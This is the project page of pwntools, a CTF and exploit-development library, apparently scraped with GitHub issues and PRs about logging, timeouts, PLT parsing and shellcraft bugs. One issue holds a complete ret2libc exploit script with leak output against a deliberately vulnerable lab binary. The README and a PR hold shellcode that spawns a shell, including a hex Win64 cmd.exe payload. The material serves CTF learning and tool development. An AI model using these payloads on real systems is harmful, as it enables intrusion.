CTF framework and exploit development library

Overview

pwntools - CTF toolkit

Pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.

from pwn import *
context(arch = 'i386', os = 'linux')

r = remote('exploitme.example.com', 31337)
# EXPLOIT CODE GOES HERE
r.send(asm(shellcraft.sh()))
r.interactive()

Documentation

Our documentation is available at docs.pwntools.com

A series of tutorials is also available online

To get you started, we've provided some example solutions for past CTF challenges in our write-ups repository.

Installation

Pwntools is best supported on 64-bit Ubuntu LTS releases (14.04, 16.04, 18.04, and 20.04). Most functionality should work on any POSIX-like distribution (Debian, Arch, FreeBSD, OSX, etc.).

Python3 is suggested, but Pwntools still works with Python 2.7. Most of the functionality of pwntools is self-contained and Python-only. You should be able to get running quickly with

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

However, some of the features (assembling/disassembling foreign architectures) require non-Python dependencies. For more information, see the complete installation instructions here.

Contribution

See CONTRIBUTING.md

Contact and Community

If you have any questions not worthy of a bug report, join the Discord server at https://discord.gg/96VA2zvjCB

Comments
  • Python3 Support

    Python3 Support

    Is this something that we have any interest in implementing? There are a lot of things that I want to use pwntools for, which have Python3 embedded in them (e.g. default GDB on Ubuntu).

    feature 
    opened by zachriggle 41
  • Segmentation fault loading arm binary files on termux

    Segmentation fault loading arm binary files on termux

    Whenever I tried to load the binary in my environment using ELF, it crashes and I get a segmentation fault. What's the reason behind this? Is there any way to get this to work on my device?

    mystery 
    opened by delmarocks 39
  • Automatic building of the binaries in pwnlib/data/binutils

    Automatic building of the binaries in pwnlib/data/binutils

    It would be awesome if we did not depend on the pre-built binaries in pwnlib/data/binutils.

    I built them originally a long time ago and I have a hard time remembering how. I am pretty sure that with the exception of the objcopy/objdump it was a fairly standard thing to do.

    I think that for those two I did some magic to figure out every possible target to compile them in. Or rather: almost every possible target, as some of them made binutils not build.

    enhancement 
    opened by TethysSvensson 35
  • Parse PLT instructions

    Parse PLT instructions

    Parse the instructions in the PLT section to determine which GOT entry the function stubs are loading.

    This properly handles RELRO and PIE executables across the following configurations (compiler per target):

    x86:         gcc-4.8 (Ubuntu 4.8.5-4ubuntu2) 4.8.5
    x64:         gcc (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
    arm:         arm-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    thumb:       arm-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    aarch64:     aarch64-linux-gnu-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    arm-big:     armeb-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    thumb-big:   armeb-linux-gnueabihf-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016
    aarch64-big: aarch64_be-linux-gnu-gcc (Linaro GCC 6.2-2016.11) 6.2.1 20161016

    testcases.zip contains sample binaries - these might be nice to add to the repo as actual test cases if possible (for regression testing, etc.).

    Note that I haven't tested these changes with non-GCC compilers yet, so further testing is strongly appreciated (in particular, it'd be nice to know what linux-clang does!).

    enhancement 
    opened by nneonneo 24
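For x86, the stub decoding described in this PR comes down to reading the indirect jmp at the top of each PLT entry and working out which GOT slot it dispatches through. The block below is an added example (my own code, not pwntools' ELF/PLT parser and not the PR's implementation) that does this for the x86-64 and i386 forms only, including the CET (endbr) and MPX (bnd) prefixed `.plt.sec` variant; the stub bytes and addresses are hand-assembled for illustration rather than taken from the PR's testcases.zip, and the ARM/AArch64 cases in the table above are not covered.

```python
import struct

# Hand-assembled PLT stubs for this example (constructed input, not the
# binaries in the PR's testcases.zip). Each entry is (stub address, bytes).
SAMPLE_STUBS = {
    # x86-64 classic .plt entry:            jmp qword ptr [rip+0x2fe2]
    "x64_plain":  (0x401020,   bytes.fromhex("ff25e22f0000")),
    # x86-64 .plt.sec entry with CET/MPX:   endbr64 ; bnd jmp [rip+0x2fad]
    "x64_ibt":    (0x401060,   bytes.fromhex("f30f1efaf2ff25ad2f0000")),
    # i386 non-PIE:                          jmp dword ptr [0x0804a00c]
    "i386_nopie": (0x08048300, bytes.fromhex("ff250ca00408")),
    # i386 PIE (ebx holds the GOT base):     jmp dword ptr [ebx+0xc]
    "i386_pie":   (0x00001030, bytes.fromhex("ffa30c000000")),
}

ENDBR64 = bytes.fromhex("f30f1efa")
ENDBR32 = bytes.fromhex("f30f1efb")


def plt_stub_to_got(stub_addr, code, bits):
    """Decode the indirect jmp at the start of a PLT stub and return the GOT
    slot it dispatches through.

    Returns ("abs", address) when the slot address is fixed (x86-64
    RIP-relative, or i386 non-PIE absolute) and ("gotrel", offset) for the
    i386 PIE form, where the slot is ebx-relative and ebx is set to the GOT
    base by the caller; add .got.plt's load address to turn it into a VA.
    """
    i = 0
    if code.startswith(ENDBR64 if bits == 64 else ENDBR32):
        i += 4                                    # skip the CET landing pad
    if code[i:i + 1] == b"\xf2":
        i += 1                                    # skip the MPX "bnd" prefix
    opcode, modrm = code[i], code[i + 1]
    if opcode != 0xff or (modrm >> 3) & 7 != 4:   # FF /4 is jmp r/m32|64
        raise ValueError("no indirect jmp at stub offset %d" % i)
    disp = struct.unpack_from("<i", code, i + 2)[0]
    end = i + 6                                   # ff + modrm + disp32
    if bits == 64 and modrm == 0x25:              # mod=00 rm=101: [rip+disp32]
        return ("abs", stub_addr + end + disp)
    if bits == 32 and modrm == 0x25:              # mod=00 rm=101: [disp32]
        return ("abs", disp & 0xffffffff)
    if bits == 32 and modrm == 0xa3:              # mod=10 rm=011: [ebx+disp32]
        return ("gotrel", disp)
    raise ValueError("unsupported PLT stub form, modrm=%#x" % modrm)


def resolve_samples():
    """Run the decoder over the constructed stubs; keys name the case."""
    bits = {"x64_plain": 64, "x64_ibt": 64, "i386_nopie": 32, "i386_pie": 32}
    return {name: plt_stub_to_got(addr, code, bits[name])
            for name, (addr, code) in SAMPLE_STUBS.items()}


if __name__ == "__main__":
    for name, (kind, value) in resolve_samples().items():
        print("%-10s %-6s %#x" % (name, kind, value))
```

The RIP-relative case is the one worth remembering when writing ret2plt or GOT-overwrite chains by hand: the displacement is relative to the end of the jmp instruction, so a prefix byte shifts the computed slot address even though the displacement field is unchanged.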
  • Pwntools runs especially slow on ubuntu compared to other distros

    Pwntools runs especially slow on ubuntu compared to other distros

    Consider the attached zip file; help.zip

    On migrating from Kali to Ubuntu 20.04.2.0 LTS, I have noticed that pwntools runs significantly more slowly for local scripts on Ubuntu than on other Linux distros.

    Here is the result of the same script being run on Ubuntu 20.04.2.0 LTS (VMware) versus Kali Linux (VirtualBox):

    Ubuntu 20.04.2.0 LTS VMware:

    (screenshot)

    Kali Linux VirtualBox:

    (screenshot)

    Running more tests, I have also experimented with other flavors as well:

    Ubuntu 18.04 VMware : 2 minutes

    Ubuntu Vagrant (VBOX) : 1 minute (attributed to the tester's faster pc but still significantly slow)

    Debian Buster (Clean Install) : 5 seconds

    Ubuntu WSL1 : 9 seconds

    Furthermore, I have tried it on both v4.7.0 (dev) and v4.5.0 (stable) and the same issue persists.

    Hence the only common cause spotted was the use of Ubuntu Desktop, which runs pwntools rather slowly.

    I have been unable to get to the bottom of the issue so far; please do look into this and let me know if there's anything I can do to help get to the bottom of it.

    bug backport-required 
    opened by caprinux 21
  • Python 3 compatibility [ready]

    Python 3 compatibility [ready]

    This branch is highly experimental, I don't even expect to get it merged any time soon (I should probably split it into several PRs), but I guess it is quite ready for automatic testing and reviews.

    opened by Arusekk 21
  • NameError: global name 'numb' is not defined

    NameError: global name 'numb' is not defined

    Traceback (most recent call last):
      File "foo.py", line 907, in <module>
        inp = sys.stdin.readline().strip().decode('utf-8')
      File "/lib/python2.7/site-packages/pwnlib/term/readline.py", line 412, in readline
        return readline(size)
      File "/lib/python2.7/site-packages/pwnlib/term/readline.py", line 376, in readline
        keymap.handle_input()
      File "/lib/python2.7/site-packages/pwnlib/term/keymap.py", line 20, in handle_input
        self.send(key.get())
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 164, in get
        k = _peek()
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 159, in _peek
        return _peek_ti() or _peek_csi() or _peek_simple()
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 393, in _peek_csi
        return _peekkey_ss3(2)
      File "/lib/python2.7/site-packages/pwnlib/term/key.py", line 372, in _peekkey_ss3
        _cbuf = _cbuf[numb:] # XXX: numb is not defined
    NameError: global name 'numb' is not defined
    
    

    This happens when I press + and Enter on the numeric keypad without Num Lock on. It's also kind of weird that this is handled by pwnlib at all, since I call a function from sys.

    bug 
    opened by rofl0r 21
  • Attempt at improving logging

    Attempt at improving logging

    The logging subsystem was rewritten to use the logging module. I think this is a good idea and I think we can do it better. This PR is an attempt at that.

    The current logging subsystem has some issues:

    • It installs a new default Logger class. This means that if someone imports pwnlib and then uses the logging module they will get our overloaded Loggers. While this may not cause any problems (our Logger works just like logging.Logger in most regards) it is still bad; import pwnlib should have no side-effects.
    • We generate different log records for the same program depending on the value of term.term_mode. If I install a file logger, I shouldn't see any difference.
    • Spinners generate log records originating from loggers named 'pwnlib.spinner.x'. This makes it hard to filter messages from a single submodule.

    Let's begin with the latter issue. If I run this:

    from pwn import *
    import logging
    logger = logging.getLogger('pwnlib.tubes.listen')
    logger.setLevel(logging.WARNING)
    sock = listen(1337).wait_for_connection()
    

    I expect the spinners to not show. But they do. Instead I have to write:

    from pwn import *
    import logging
    logger = logging.getLogger('pwnlib.spinner')
    logger.setLevel(logging.WARNING)
    sock = listen(1337).wait_for_connection()
    

    But then I can't have any spinners at all :(.

    Next issue; If I run this:

    from pwn import *
    sock = listen(1337)
    sock.recvall()
    

    And then send 10MB, I see this in my terminal:

    [+] Trying to bind to 0.0.0.0 on port 1337: Done
    [+] Waiting for connections on 0.0.0.0:1337: Got connection from 127.0.0.1 on port 35277
    [+] Recieving all data: Done (10.00MB)
    [*] Closed connection to 127.0.0.1 port 35277
    

    Which is fine. But if I then also log to a file:

    from pwn import *
    import logging
    logging.basicConfig(filename = 'test.log')
    sock = listen(1337)
    sock.recvall()
    

    Then the file contains:

    INFO:pwnlib.tubes.sock:Closed connection to 127.0.0.1 port 35279
    

    But if I instead pipe the output from python into cat (thus setting term.term_mode to false) I see this in my terminal:

    [*] Trying to bind to 0.0.0.0 on port 1337: 
    [*] Trying to bind to 0.0.0.0 on port 1337: Trying 0.0.0.0
    [+] Trying to bind to 0.0.0.0 on port 1337: Done
    [*] Waiting for connections on 0.0.0.0:1337: 
    [*] Recieving all data: 
    [+] Waiting for connections on 0.0.0.0:1337: Got connection from 127.0.0.1 on port 35282
    [*] Recieving all data: 0B
    [*] Recieving all data: 1.69MB
    [*] Recieving all data: 3.47MB
    [*] Recieving all data: 5.24MB
    [*] Recieving all data: 7.08MB
    [*] Recieving all data: 8.92MB
    [+] Recieving all data: Done (10.00MB)
    [*] Closed connection to 127.0.0.1 port 35282
    

    And this in test.log:

    INFO:pwnlib.spinner.0:Trying to bind to 0.0.0.0 on port 1337: 
    INFO:pwnlib.spinner.0:Trying to bind to 0.0.0.0 on port 1337: Trying 0.0.0.0
    INFO:pwnlib.spinner.0:Trying to bind to 0.0.0.0 on port 1337: Done
    INFO:pwnlib.spinner.1:Waiting for connections on 0.0.0.0:1337: 
    INFO:pwnlib.spinner.2:Recieving all data: 
    INFO:pwnlib.spinner.1:Waiting for connections on 0.0.0.0:1337: Got connection from 127.0.0.1 on port 35282
    INFO:pwnlib.spinner.2:Recieving all data: 0B
    INFO:pwnlib.spinner.2:Recieving all data: 1.69MB
    INFO:pwnlib.spinner.2:Recieving all data: 3.47MB
    INFO:pwnlib.spinner.2:Recieving all data: 5.24MB
    INFO:pwnlib.spinner.2:Recieving all data: 7.08MB
    INFO:pwnlib.spinner.2:Recieving all data: 8.92MB
    INFO:pwnlib.spinner.2:Recieving all data: Done (10.00MB)
    INFO:pwnlib.tubes.sock:Closed connection to 127.0.0.1 port 35282
    

    All three issues are resolved in this PR.

    enhancement 
    opened by br0ns 19
  • What are the semantics of the return value and the `timeout` argument of the `pwnlib.tubes.tubes.recv*`-functions?

    What are the semantics of the return value and the `timeout` argument of the `pwnlib.tubes.tubes.recv*`-functions?

    The semantics have already changed several times, and I think that is mostly because they have never been explicitly written down. So let's fix that.

    Currently the semantics are as follows to the best of my knowledge.

    Return value:

    • If the call was successful the received data is returned.
    • If there was a timeout ("timeout" should be clarified -- @zachriggle?) the empty string is returned.
    • If the tube is closed EOFError is raised.

    The timeout-argument:

    • If None, the "default" value is used. The default value can refer to a value given when creating a socket or context.timeout if None was also given here.
    • If a non-negative number is given this is used as the timeout during the function call (or the tubes lifetime if in a constructor).
    • Everything else raises an error.

    I can recall at least three other semantics being applied in pwnlib.

    I suggest we adopt these new semantics:

    Return value:

    • If the call was successful the received data is returned.
    • If there was a timeout (again, needs clarification) socket.timeout is raised.
    • If the tube is closed EOFError is raised.

    The timeout-argument:

    • If the string 'default' is given, the "default" value is used, as described above.
    • If None is given there is no timeout, i.e. blocking forever is possible. This is also the semantics of socket module in the standard library.
    • If a non-negative number is given the semantics are as described above.
    • Everything else raises an error.

    The biggest issue I have with the current semantics is returning the empty string when a timeout occurs. On several occasions I've made a typo in e.g. a recvuntil-call and thus always got the empty string as a result; if this result is never used it can be hard to find the bug.

    I also really think we should adopt the None-means-no-timeout semantics, as 1) they are used by the standard library and 2) timeout = None reads better. Also note that the user will never have to actually write 'default', so it can be anything other than None and numbers.

    question 
    opened by br0ns 18
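To make the proposed semantics concrete, here is an added example (my own code, not pwntools' tube implementation) of a minimal tube over a socketpair that implements the 'default' / None / non-negative-number rules for the timeout argument and raises on timeout instead of returning b''. DEFAULT_TIMEOUT stands in for context.timeout and is an assumption of the example; the peer socket plays the remote side so the whole thing runs offline.

```python
import select
import socket
import time

# Assumed stand-in for context.timeout (not a pwntools value).
DEFAULT_TIMEOUT = 0.05


class TimeoutTube:
    """Tiny tube over a socketpair with the semantics proposed above:
    'default' -> the tube's default timeout, None -> block forever,
    a non-negative number -> that many seconds, anything else -> ValueError.
    A timeout raises socket.timeout rather than returning b''."""

    def __init__(self, default_timeout=DEFAULT_TIMEOUT):
        self._sock, self.peer = socket.socketpair()   # peer plays the remote side
        self.timeout = default_timeout
        self.closed = False

    def resolve_timeout(self, timeout):
        if timeout == 'default':
            return self.timeout
        if timeout is None:
            return None                                # like the socket module
        if isinstance(timeout, bool) or not isinstance(timeout, (int, float)) or timeout < 0:
            raise ValueError("timeout must be 'default', None or >= 0, got %r" % (timeout,))
        return float(timeout)

    def recv(self, numb=4096, timeout='default'):
        if self.closed:
            raise EOFError("tube is closed")
        t = self.resolve_timeout(timeout)
        ready, _, _ = select.select([self._sock], [], [], t)   # t=None blocks forever
        if not ready:
            raise socket.timeout("no data within %r s" % t)
        data = self._sock.recv(numb)
        if not data:                                           # orderly shutdown by the peer
            self.closed = True
            raise EOFError("tube is closed")
        return data

    def recvuntil(self, delim, timeout='default'):
        """One deadline for the whole call, not one per byte."""
        t = self.resolve_timeout(timeout)
        deadline = None if t is None else time.monotonic() + t
        buf = b''
        while delim not in buf:
            remaining = None if deadline is None else max(0.0, deadline - time.monotonic())
            buf += self.recv(1, timeout=remaining)
        return buf

    def close(self):
        self._sock.close()
        self.peer.close()


def typo_in_delimiter():
    """The failure mode from the discussion: a misspelled delimiter. With
    the proposed semantics it is loud (socket.timeout), not a silent b''."""
    tube = TimeoutTube()
    try:
        tube.peer.sendall(b'Enter password: ')
        tube.recvuntil(b'Enter pasword: ')        # deliberate typo, never matches
        return 'matched'
    except socket.timeout:
        return 'timeout'
    finally:
        tube.close()


def eof_is_an_error():
    """Closed tube -> EOFError, distinct from a timeout."""
    tube = TimeoutTube()
    try:
        tube.peer.sendall(b'bye')
        tube.peer.close()
        first = tube.recv(timeout=None)            # b'bye', no timeout involved
        try:
            tube.recv(timeout=None)
        except EOFError:
            return first, 'eof'
        return first, 'data'
    finally:
        tube.close()


def rejects(timeout):
    """True if the timeout value is refused with ValueError."""
    tube = TimeoutTube()
    try:
        tube.resolve_timeout(timeout)
        return False
    except ValueError:
        return True
    finally:
        tube.close()


if __name__ == "__main__":
    print(typo_in_delimiter(), eof_is_an_error(), rejects(-1))
```

The three outcomes a caller has to tell apart (data, timeout, closed tube) map onto three distinct signals here: a return value, socket.timeout and EOFError. That is what makes the typo above detectable: a script that misspells a prompt stops at the recvuntil instead of carrying on with an empty buffer.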
  • [WIP] Selectively skip doctest

    [WIP] Selectively skip doctest

    The intention of this is to make it possible to test pwntools on systems where some functionality is known not to work. This makes use of a new sphinx feature to selectively disable doctests. In particular, doctests that require binutils/qemu for a specific architecture, doctests that require internet access and doctests that depend on specific machine setup (marked travis) can be skipped.

    This is a work in progress. Currently all flags are hardcoded as False, instead they should default to True and be changeable through flags or environment variables. But it should be ready for general feedback on the main idea. Is this something you'd in principle be willing to consider @zachriggle?

    My use-case for this is automated testing for distribution packaging. Another use case would be the possibility for contributors to run at least some of the test suite locally without having the full setup that is available on Travis.

    opened by timokau 17
  • pwnlib.dynelf.DynELF breaks something to make exploit broken

    pwnlib.dynelf.DynELF breaks something to make exploit broken

    It looks like a bug.

    I am following an article (in Chinese) to learn ROP.

    Assumption: YOU DONT HAVE libc.so.

    The system is i686 Ubuntu 15.04:

    Linux vagrant 3.19.0-56-generic #62-Ubuntu SMP Thu Mar 10 22:39:28 UTC 2016 i686 i686 i686 GNU/Linux
    

    The vulnerable program:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 256);
    }
    
    int main(int argc, char** argv) {
        vulnerable_function();
        write(STDOUT_FILENO, "Hello, World\n", 13);
    }
    

    DISAS:

    (gdb) disas main
    Dump of assembler code for function main:
       0x0804840d <+0>: push   %ebp
       0x0804840e <+1>: mov    %esp,%ebp
       0x08048410 <+3>: and    $0xfffffff0,%esp
       0x08048413 <+6>: sub    $0x10,%esp
       0x08048416 <+9>: call   0x80483e4 <vulnerable_function>
       0x0804841b <+14>:    movl   $0xd,0x8(%esp)
       0x08048423 <+22>:    movl   $0x8048504,0x4(%esp)
       0x0804842b <+30>:    movl   $0x1,(%esp)
       0x08048432 <+37>:    call   0x8048300 <write@plt>
       0x08048437 <+42>:    leave
       0x08048438 <+43>:    ret
    End of assembler dump.
    (gdb) disas vulnerable_function
    Dump of assembler code for function vulnerable_function:
       0x080483e4 <+0>: push   %ebp
       0x080483e5 <+1>: mov    %esp,%ebp
       0x080483e7 <+3>: sub    $0x98,%esp
       0x080483ed <+9>: movl   $0x100,0x8(%esp)
       0x080483f5 <+17>:    lea    -0x88(%ebp),%eax
       0x080483fb <+23>:    mov    %eax,0x4(%esp)
       0x080483ff <+27>:    movl   $0x0,(%esp)
       0x08048406 <+34>:    call   0x8048320 <read@plt>
       0x0804840b <+39>:    leave
       0x0804840c <+40>:    ret
    End of assembler dump.
    

    ASLR:

    $ cat /proc/sys/kernel/randomize_va_space
    2
    

    compile:

    $ gcc -fno-stack-protector -o level2 level2.c
    

    Addr of .bss:

    [25] .bss              NOBITS          0804a024 001024 000004 00  WA  0   0  1
    

    gadgets:

    $ ROPgadget --binary ./level2 --only "pop|pop|pop|ret"
    Gadgets information
    ============================================================
    0x0804850b : pop ebp ; ret
    0x08048508 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
    0x080482f1 : pop ebx ; ret
    0x0804850a : pop edi ; pop ebp ; ret
    0x08048509 : pop esi ; pop edi ; pop ebp ; ret
    0x080482da : ret
    0x080483ce : ret 0xeac1
    
    Unique gadgets found: 7
    

    Addr of vulnerable_function:

    (gdb) print vulnerable_function
    $1 = {<text variable, no debug info>} 0x804844b <vulnerable_function>
    

    The exploit: you can see the leak there, using write@plt to get the actual address of write.

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    from pwn import *
    
    elf = ELF('./level2')
    plt_write = elf.symbols['write']   # write@plt
    plt_read = elf.symbols['read']     # read@plt
    vulfun_addr = 0x804844b
    
    def leak(address):
        # 140 bytes reach the saved return address; call write(1, address, 4)
        # and return into vulnerable_function so the next leak can be chained.
        payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) + p32(address) + p32(4)
        p.send(payload1)
        data = p.recv(4)
        print "%#x => %s" % (address, (data or '').encode('hex'))
        return data
    
    
    p = process('./level2')
    #p = remote('127.0.0.1', 10002)
    
    # DynELF resolves symbols through leak() alone, without a local libc.
    d = DynELF(leak, elf=ELF('./level2'))
    
    system_addr = d.lookup('system', 'libc')
    print "system_addr=" + hex(system_addr)
    
    bss_addr = 0x0804a024
    pppr = 0x08048509 # addr of pop pop pop ret
    
    # read(0, bss, 10) to place "/bin/dash\0", pop the three args, then system(bss)
    payload2 = 'a'*140  + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(10)
    payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)
    #ss = raw_input()
    
    print "\n###sending payload2 ...###"
    p.send(payload2)
    p.send("/bin/dash\0")
    
    p.interactive()
    

    And I got this:

    [+] Started program './level2'
    0x8048000 => 7f454c46
    [+] Loading from '/home/vagrant/workspace/rop/level2': Done
    0x804a004 => 383977b7
    [+] Resolving 'system' in 'libc.so': 0xb7773938
    0x8049f14 => 01000000
    0x8049f1c => 0c000000
    0x8049f24 => 0d000000
    0x8049f2c => 19000000
    0x8049f34 => 1b000000
    0x8049f3c => 1a000000
    0x8049f44 => 1c000000
    0x8049f4c => f5feff6f
    0x8049f54 => 05000000
    0x8049f5c => 06000000
    0x8049f64 => 0a000000
    0x8049f6c => 0b000000
    0x8049f74 => 15000000
    0x8049f7c => 03000000
    0x8049f80 => 00a00408
    0xb777393c => 243c77b7
    0xb7773c24 => 00000000
    0xb7773944 => 283c77b7
    0xb7773c2c => 943e77b7
    0xb7773e94 => 00000000
    0xb7773c34 => 58c874b7
    0xb774c85c => 38c874b7
    0xb774c838 => 2f6c6962
    0xb774c83c => 2f693338
    0xb774c840 => 362d6c69
    0xb774c844 => 6e75782d
    0xb774c848 => 676e752f
    0xb774c84c => 6c696263
    0xb774c850 => 2e736f2e
    0xb774c854 => 36000000
    0xb774c858 => 00a058b7
    0xb758a000 => 7f454c46
    0xb774c860 => a40d74b7
    0xb758a004 => 01010103
    0xb7740da4 => 01000000
    0xb7740dac => 0e000000
    0xb7740db4 => 0c000000
    0xb7740dbc => 19000000
    0xb7740dc4 => 1b000000
    0xb7740dcc => 04000000
    0xb7740dd4 => f5feff6f
    0xb7740dd8 => b8a158b7
    0xb7740ddc => 05000000
    0xb7740de0 => 747459b7
    0xb7740de4 => 06000000
    0xb7740de8 => d4de58b7
    0xb758a1b8 => f3030000
    0xb758a1bc => 0a000000
    0xb758a1c0 => 00020000
    0xb758b390 => a5050000
    0xb758d000 => 8ae4ee1c
    0xb7593924 => a1300000
    0xb759a515 => 73797374
    0xb759a519 => 656d0074
    0xb7593928 => 60b10300
    system_addr=0xb75c5160
    
    ###sending payload2 ...###
    [*] Switching to interactive mode
    $ ls
    [*] Got EOF while reading in interactive
    $ ls
    [*] Program './level2' stopped with exit code -11
    [*] Got EOF while sending in interactive
    

    It looks like something breaks interactive mode. I typed ls twice, then Enter. When did I send EOF? And I could not find info about exit code -11.

    UPDATED: The 140 is confirmed in a core dump using exploit-pattern

    opened by naijim 17
  • Add basic shellcode for Win64 to shellcraft

    Add basic shellcode for Win64 to shellcraft

    This adds basic WinExec("cmd.exe") Win64 shellcode generation to shellcraft. The generated shellcode does not contain null-bytes.

    I've tried to split it up into smaller reusable chunks. Used it with some Windows pwn and it worked for me.

    We could try to add tests using wine, but since windows support is more of an addon in pwntools I didn't go for it yet.

    $ shellcraft amd64.windows.cmd
    [!] Could not find system include headers for amd64-windows
    31f665488b5e60488b5b18488b732048ad489648ad488b5820448b433c4c89c24801da4531c941b1884c01ca448b024901d8418b70204801de4831c949b947657450726f634148ffc18b048e4801d84c390875f2418b70244801de668b0c4e418b701c4801de8b048e4801d84889c748b801010101010101015048b856686f4479646201483104244889e231f665488b4e60488b4918488b712048ad489648ad488b48204883ec30ffd74883c4384889c648b801010101010101015048b8626c652f64796401483104244889e14883ec30ffd64883c438ebfe
    
    opened by peace-maker 0
  • shellcraft: mips syscall with 6 arguments ignores arg4 and arg5

    shellcraft: mips syscall with 6 arguments ignores arg4 and arg5

    When trying to call a syscall with more than 4 arguments, the excess arguments are silently ignored instead of pushing them to the stack.

    $ shellcraft -f asm mips.linux.syscall SYS_sendto 3 0x123456 0x100 0 0xabcdefff 0x10
        /* call sendto(3, 0x123456, 0x100, 0, 0xabcdefff, 0x10) */
        li $t9, ~3
        not $a0, $t9
        li $t9, ~0x123456
        not $a1, $t9
        li $t9, ~0x100
        not $a2, $t9
        slti $a3, $zero, 0xFFFF /* $a3 = 0 */
        ori $v0, $zero, SYS_sendto
        syscall 0x40404
    

    The expected output would include the last two arguments on the stack:

    /* call sendto(3, 0x123456, 0x100, 0, 0xabcdefff, 0x10) */
    addiu $sp, $sp, -0x18
    li $v0, 0xabcdefff
    sw $v0, 0x10($sp)
    li $t9, ~0x10
    not $v0, $t9
    sw $v0, 0x14($sp)
    
    li $t9, ~3
    not $a0, $t9
    li $t9, ~0x123456
    not $a1, $t9
    li $t9, ~0x100
    not $a2, $t9
    slti $a3, $zero, 0xFFFF /* $a3 = 0 */
    /* call sendto() */
    ori $v0, $zero, SYS_sendto
    syscall 0x40404
    
    bug backport-required 
    opened by peace-maker 0
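The o32 convention behind the expected output (first four arguments in $a0-$a3, the rest stored at 0x10($sp) onwards after reserving a frame) is small enough to show in full. The generator below is an added example, my own code rather than shellcraft's implementation or the fix for this issue. The NUL-avoidance rule it applies (emit `li $t9, ~imm; not reg, $t9` when the plain `li` encoding would contain a zero byte, and `slti` for zero) is my reading of the output above; the register numbers and opcode encodings are standard MIPS32, and the `not` and `syscall` encodings are not checked for NUL bytes.

```python
# MIPS32 o32 register numbers used below.
REGS = {"$zero": 0, "$v0": 2, "$a0": 4, "$a1": 5, "$a2": 6, "$a3": 7, "$t9": 25}
ARG_REGS = ("$a0", "$a1", "$a2", "$a3")
STACK_ARG_BASE = 0x10      # o32: the 5th argument lives at 16($sp), the 6th at 20($sp), ...


def li_words(rt, value):
    """Encode what the assembler expands `li $rt, value` into, as 32-bit words:
    addiu/ori for 16-bit immediates, lui (+ ori) otherwise."""
    value &= 0xffffffff
    signed = value - (1 << 32) if value & 0x80000000 else value
    if -0x8000 <= signed <= 0x7fff:
        return [0x24000000 | (rt << 16) | (value & 0xffff)]        # addiu rt, $zero, imm
    if value <= 0xffff:
        return [0x34000000 | (rt << 16) | value]                   # ori rt, $zero, imm
    words = [0x3c000000 | (rt << 16) | (value >> 16)]              # lui rt, hi16
    if value & 0xffff:
        words.append(0x34000000 | (rt << 21) | (rt << 16) | (value & 0xffff))  # ori rt, rt, lo16
    return words


def has_nul(words):
    """True if any encoded instruction contains a zero byte (endianness irrelevant)."""
    return any(b == 0 for w in words for b in w.to_bytes(4, "big"))


def load_imm(reg, value):
    """Assembly lines that put `value` in `reg`, avoiding NUL bytes where possible."""
    value &= 0xffffffff
    if value == 0:
        # 0 < -1 is false, so slti yields 0, and the encoding has no zero byte.
        return ["slti %s, $zero, 0xFFFF /* %s = 0 */" % (reg, reg)]
    if not has_nul(li_words(REGS[reg], value)):
        return ["li %s, %#x" % (reg, value)]
    inverted = ~value & 0xffffffff
    if not has_nul(li_words(REGS["$t9"], inverted)):
        return ["li $t9, ~%#x" % value, "not %s, $t9" % reg]
    return ["li %s, %#x /* NUL bytes unavoidable here */" % (reg, value)]


def mips_syscall(name, args):
    """Emit o32 assembly for `name(*args)`, spilling arguments 5 onwards to the stack."""
    out = ["/* call %s(%s) */" % (name, ", ".join("%#x" % a for a in args))]
    stack_args = args[4:]
    if stack_args:
        frame = STACK_ARG_BASE + 4 * len(stack_args)
        frame = (frame + 7) & ~7                                   # keep $sp 8-byte aligned
        out.append("addiu $sp, $sp, -%#x" % frame)
        for i, val in enumerate(stack_args):
            out += load_imm("$v0", val)                            # $v0 is free until the syscall number
            out.append("sw $v0, %#x($sp)" % (STACK_ARG_BASE + 4 * i))
    for reg, val in zip(ARG_REGS, args):
        out += load_imm(reg, val)
    out.append("ori $v0, $zero, %s" % name)
    out.append("syscall 0x40404")
    return out


if __name__ == "__main__":
    print("\n".join(mips_syscall("SYS_sendto", [3, 0x123456, 0x100, 0, 0xabcdefff, 0x10])))
```

Running the sendto case from the report reproduces the expected listing above line for line, including the direct `li $v0, 0xabcdefff` (its lui/ori pair has no zero byte) next to the inverted form for 0x10. The stack reservation is never undone, which is fine for shellcode that does not return but would corrupt the caller's frame if this were used inside a normal function.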
  • Fixes for download_dir

    Fixes for download_dir

    • Fixes a bug of missing .recvall().strip() when self.sftp == False
    • Adds option ignore_failed_read to ignore files in the folder that current user has no read access
    • Deletes created temporary file after download
    opened by Jusb3 0
  • Configure /usr/pwntools-doc

    Configure /usr/pwntools-doc

    hi!

    I'm trying to package the new 4.9.0 version and noticed this diff by our packaging tools:

    usr/lib/python3.10/site-packages/pwntools-doc/		      |	usr/pwntools-doc/
    usr/lib/python3.10/site-packages/pwntools-doc/CHANGELOG.md    |	usr/pwntools-doc/CHANGELOG.md
    usr/lib/python3.10/site-packages/pwntools-doc/CONTRIBUTING.md |	usr/pwntools-doc/CONTRIBUTING.md
    usr/lib/python3.10/site-packages/pwntools-doc/DOCKER.md	      |	usr/pwntools-doc/DOCKER.md
    usr/lib/python3.10/site-packages/pwntools-doc/LICENSE-pwntool |	usr/pwntools-doc/LICENSE-pwntools.txt
